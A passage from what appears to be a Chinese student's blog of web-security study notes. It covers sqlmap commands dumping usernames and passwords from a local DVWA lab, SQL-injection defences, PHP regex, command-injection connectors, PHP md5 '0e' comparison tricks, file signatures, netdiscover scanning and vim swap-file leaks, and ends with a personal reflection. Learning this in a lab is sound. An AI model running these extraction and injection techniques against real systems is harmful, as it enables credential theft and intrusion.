<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\high.txt” –second-url “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;</a> –columns -D dvwa -T users     （POST型，输入和回显不在同一个页面)</p>
<p>6、爆内容</p>
<p>python sqlmap.py -u “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;</a> –cookie “security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4” –dump -D dvwa -T users -C “user,password”     （GET型）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\medium.txt” –dump -D dvwa -T users -C “user,password”     （POST型）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\high.txt” –second-url “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;</a> –dump -D dvwa -T users -C “user,password”     （POST型，输入和回显不在同一个页面)</p>
<h2 id="3-3SQL注入防御"><a href="#3-3SQL注入防御" class="headerlink" title="3.3SQL注入防御"></a>3.3SQL注入防御</h2><p>SQL注入形成的原因是数据和代码没分离，用户可控的数据可以作为SQL语句执行。</p>
<p>因此防御sql注入最有效的方法是使用预编译语句，就像IMPOSSIBLE关这样。</p>
<p>预编译之后输入的参数不会再进行SQL编译，SQL语句的语义不会发生变化。</p>
<p>除此之外，也可以采用安全的存储过程，但存储过程本身可能存在注入；检查输入的数据类型也是有用的，但不是万能的；使用安全函数，注意数据库的最小权限原则也是有利的。</p>
<h2 id="4-1php正则匹配"><a href="#4-1php正则匹配" class="headerlink" title="4.1php正则匹配"></a>4.1php正则匹配</h2><p>元字符：</p>
<p>\d    匹配任意一个0-9的数字</p>
<p>\D    匹配任意一个除十进制数以外的字符，等价于[^0-9]</p>
<p>\s    匹配任意一个空白的字符，比如换页符、换行符、回车符号、制表符、垂直制表符</p>
<p>\S    匹配出空白字符以外的所有字符</p>
<p>\w    匹配任意一个数字或字母或下划线</p>
<p>\W    匹配除数字、字母、下划线以外的任意字符</p>
<p>.     匹配除换行符以外的任意一个字符</p>
<p>*     匹配0次，或1次、或多次其前面字符</p>
<p>+     匹配1次或多次其前面的字符</p>
<p>？    匹配0次或1次前面的字符</p>
<p>{n}   表示其前面字符恰好出现n次</p>
<p>{n,}  表示其前面字符出现不少于n次</p>
<p>{n,m} 表示其前面的字符至少出现n次，最多出现m次</p>
<p>^或\A 匹配字符串开始的位置</p>
<p>$或者\Z  匹配字符串的结束位置</p>
<p>|   匹配两个或多个模式</p>
<p>[]   匹配方括号中的任意一个字符</p>
<p>[^]  匹配除方括号中字符以外的任意一个字符</p>
<p>()  将括号中作为一个整体以便将其中的内容获取到</p>
<h3 id="4-1-1php正则表达式-w-w-w-的区别？"><a href="#4-1-1php正则表达式-w-w-w-的区别？" class="headerlink" title="4.1.1php正则表达式[\w]+,\w+,[\w+]的区别？"></a>4.1.1php正则表达式[\w]+,\w+,[\w+]的区别？</h3><p>[\w]+和\w+没有区别，都是匹配数字和字母下划线的多个字符；</p>
<p>[\w+]表示匹配数字、字母、下划线和加号本身字符；</p>
<h3 id="4-1-2例"><a href="#4-1-2例" class="headerlink" title="4.1.2例"></a>4.1.2例</h3><p>[]：表示数组而非排列，即不按固定次序位置排列；在[]内的字符可以任意次序出现。</p>
<p>[ABC]+：可以匹配”AAABBBCCC,BBBAAACCC,BACCBACAACBAC,…”，不是一定按固定A….B….C…的次序排列。</p>
<p>[\w./-+]+：是匹配\w [0-9a-zA-Z_] 或 . 或 / 或 - 或 + 字符；</p>
<p>在[./-+]内均表示字符本身；</p>
<p>在[]+外表示{1,}至少1次或多次；</p>
<p>在[.]内点，不是任意字符的意思，就是匹配点.字符本身，点.可以不需要加反斜杠.。</p>
<p>在[]内特殊字符，表示匹配特殊字符本身，不需要加反斜杠，</p>
<p>在[]外特殊字符，表示匹配特殊字符本身，必须要加反斜杠。</p>
<p>\W 元字符用于查找非单词字符。</p>
<p>单词字符包括：a-z、A-Z、0-9，以及下划线。</p>
<p>故[^\W]可以匹配所有单词字符    </p>
<p>^：非的意思</p>
<p>/^$/：正则匹配的开头结尾</p>
<h3 id="4-1-3正则表达式“-d-d-d-”是什么意思？"><a href="#4-1-3正则表达式“-d-d-d-”是什么意思？" class="headerlink" title="4.1.3正则表达式“\d+||(\d+\.\d+”是什么意思？"></a>4.1.3正则表达式“\d+||(\d+\.\d+”是什么意思？</h3><p>\d  是匹配一个数字(0到9)</p>
<p>\d 前面多了第一个\ 是为了在程序中转义第二个\，这个你可以忽略</p>
<p>+表示 1个或多个组合起来</p>
<p>\d+ 就表示多个数字，形如 12、44、6763……</p>
<p>. 匹配一个小数点</p>
<p>\d+.\d+ 就表示小数，形如12.334、0.12、87.343……</p>
<p>| 表示或者，一个竖线就够了</p>
<p>() 括号在这里表示分组，实际不匹配任何字符，此处不要括号也可以</p>
<p>\d+||(\d+.\d+)  多个连续的数字或者 多个连续的数+小数点+多个连续的数<br>翻译下就是 非负整数或者非负小数</p>
<h2 id="4-23-binwalk使用"><a href="#4-23-binwalk使用" class="headerlink" title="4.23.binwalk使用"></a>4.23.binwalk使用</h2><p>binwalk  +文件路径  //分析文件中隐藏的其他文件。<br>dd if=图片名 of=ZIP压缩包的名称（自己命名） skip=偏移量 bs=1</p>
<h2 id="5-1php定界符"><a href="#5-1php定界符" class="headerlink" title="5.1php定界符"></a>5.1php定界符</h2><p>​       短标签<?  ?>  &lt;%  %&gt;</p>
<p>​       var_dump()查看变量类型</p>
<p>​       定界符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">          $a=&lt;&lt;&lt;EOT</span><br><span class="line">          XXXXXXX</span><br><span class="line">          EOT;</span><br><span class="line">          echo $a;</span><br><span class="line">          ?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="5-2正则表达式-二）"><a href="#5-2正则表达式-二）" class="headerlink" title="5.2正则表达式(二）"></a>5.2正则表达式(二）</h2><p>模式分隔符后的”i”标记这是一个大小写不敏感的搜索</p>
<p>模式中的 \b 标记一个单词边界，所以只有独立的单词”web”会被匹配，而不会匹配</p>
<p>PHP提供4个专门的执行外部命令的函数：exec(), system(), passthru(), shell_exec()</p>
<p>除了拼接函数外，我们还可以使用命令连接符来组合这些系统函数增加命令执行成功率。常见的命令连接符有（“|，&amp;&amp;，||”这三个连接符都是Windows系统与Linux系统共有的，而“&amp;”是Windows系统特有，“；”是Linux系统特有的）：</p>
<p>|：管道操作符</p>
<p>A|B:无论执行的A命令是否正确，B命令都执行</p>
<p>&amp;&amp;：逻辑与</p>
<p>A&amp;&amp;B：只有在A命令成功执行的前提下，B命令才可以执行</p>
<p>||：逻辑或</p>
<p>A||B：只有在A命令没有执行失败的前提下，B命令才可以执行</p>
<p>&amp;</p>
<p>A&amp;B:不管A是否执行成功，B命令都会执行</p>
<p>A&amp;B:不管A是否执行成功，B命令都会执行</p>
<h2 id="5-3字符串经过md5加密"><a href="#5-3字符串经过md5加密" class="headerlink" title="5.3字符串经过md5加密"></a>5.3字符串经过md5加密</h2><p>  这里是0e开头的，在进行等于比较的时候，PHP 把它当作科学计数法，0 的无论多少次方都是零。</p>
<h2 id="5-4各类文件的16进制开头结尾"><a href="#5-4各类文件的16进制开头结尾" class="headerlink" title="5.4各类文件的16进制开头结尾"></a>5.4各类文件的16进制开头结尾</h2><p>jpg      文件头:  FF D8             文件尾： FF D9<br>JPEG     文件头：FF D8 FF           文件尾：FF D9<br>PNG    文件头：89 50 4E 47    文件尾：AE 42 60 82<br>GIF（gif ）<br>文件头：47 49 46 38    文件尾：00 3B<br>ZIP Archive（zip）<br>文件头：50 4B 03 04    文件尾：50 4B<br>TIFF（tif）<br>文件头：49 49 2A 00    文件尾：未知<br>Windows Bitmap（bmp）<br>文件头：42 4D    文件尾：未知<br>CAD（dwg）<br>文件头：41 43 31 30    文件尾：未知<br>XML（xml）<br>文件头：3C 3F 78 6D 6C    文件尾：未知<br>HTML（html）<br>文件头：68 74 6D 6C 3E<br>gif图像开始标志：47 49 46 38 39 61 结束标志：01 01 00 3B</p>
<h2 id="5-5局域网主机发现"><a href="#5-5局域网主机发现" class="headerlink" title="5.5局域网主机发现"></a>5.5局域网主机发现</h2><p>使用netdiscover 探测局域网内的主机，目的是发现需要渗透的主机</p>
<p>指定IP段</p>
<p>例如：10.10.10.0</p>
<p>netdiscover  -r 10.10.10.0/24</p>
<p>选择监听的网卡：比如eth0</p>
<p>netdiscover  -i eth0</p>
<p>主动发现：-i指定所要侦听的网卡，-r指定ip段。</p>
<p>netdiscover -i eth0 -r 10.10.10.0/24</p>
<h2 id="6-1vim-交换文件名"><a href="#6-1vim-交换文件名" class="headerlink" title="6.1vim 交换文件名"></a>6.1vim 交换文件名</h2><p>在使用vim时会创建临时缓存文件，关闭vim时缓存文件则会被删除，当vim异常退出后，因为未处理缓存文件，导致可以通过缓存文件恢复原始文件内容</p>
<p>以 index.php 为例：   </p>
<p>第一次产生的交换文件名为 .index.php.swp</p>
<p>再次意外退出后，将会产生名为 .index.php.swo 的交换文件</p>
<p>第三次产生的交换文件则为 .index.php.swn</p>
<h1 id="二、学习总结"><a href="#二、学习总结" class="headerlink" title="二、学习总结"></a>二、学习总结</h1><p>这些是近十天的学习总结，学的不算很多，但很杂乱，近期恶补了一些php代码并且参加了一些ctf比赛，虽然往往一场ctf比赛只能写出一道甚至一道都写不出，但总的来说，应该算是有了一定的基础。</p>
<p>算算时间，学习网安也有大半年了，但有效时间也只有不到两个月，在这有效学习时间内，我学习了以下内容。</p>
<p>1.burpsuite抓包爆破</p>
<p>2.top10漏洞（除CSRF）</p>
<p>3.工具的利用</p>
<p>4.近期看着博客步骤对breach1.0进行一次完整的渗透</p>
<p>5.PHP语言</p>
<p>6.MySQL数据库</p>
<p>7.认识HTML，css，js</p>
<p>8.linux基础</p>
<p>9.SQL基础</p>
<p>10.web渗透之信息收集</p>
<h1 id="三、感悟"><a href="#三、感悟" class="headerlink" title="三、感悟"></a>三、感悟</h1><p>今天是2022年10月30日，距离第一次接触网安已有一年有余，那时意气风发，抱有对黑客技术的热爱与热情加入了信息安全实验室，但在实验室，我迷茫了，对所学知识的模糊认识产生了自我否定——我是不是不适合网安，我是不是比较笨拙？带着疑惑我不知所措，导致在寒假期间彻底摆烂，也因此主动退出实验室。</p>
<p>至2022年4月13日，胡老师想找几个对网安有兴趣的学生学习网安知识，我心中的火又燃了起来，我知道这是一个机会，证明我可以学好网安的唯一机会，我又开始学习网安。这次学的不再是逆向工程，而是web安全！</p>
<p>由于当时已到学期中旬，专业课繁多，学习时间较少，也快到期末，所以网安学习计划又搁置了，到了暑假事务繁多，有效学习时间也只有不到半个月，对此我深深惭愧。</p>
<p>寒暑假逆袭的关键，而我却没有加以利用，认真去学习！</p>
<p>接着开学封校，一直到九月中旬才能来校学习，这次，我不会再浪费时间，我一直以来的黑客梦永远不会消散。</p>
<p>虽然道路艰难，但我会一直前行，漫漫长征路，偏向虎山行，此志共勉！</p>

    </div>

    
    
    

    <footer class="post-footer"><div class="post-widgets">
    <div
      class="social-share"
      
        data-sites="weibo,qq,wechat,tencent,douban,qzone,linkedin,diandian,facebook,twitter,google"
      
      
        data-wechat-qrcode-title="share.title"
      
      
        data-wechat-qrcode-helper="share.prompt"
      
    >
    </div>
  </div>
  <script src="https://lib.baomitu.com/social-share.js/1.0.16/js/social-share.min.js"></script>
          <div class="post-tags">
              <a href="/tags/%E2%80%94%E2%80%94web/" rel="tag"># ——web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/10/03/%E7%BD%91%E5%AE%89%E7%AF%87%EF%BC%884%EF%BC%89/" rel="prev" title="网安篇（4）">
                  <i class="fa fa-chevron-left"></i> 网安篇（4）
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">alun</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">14k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">23 分钟</span>
  </span>
</div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





</body>
</html>
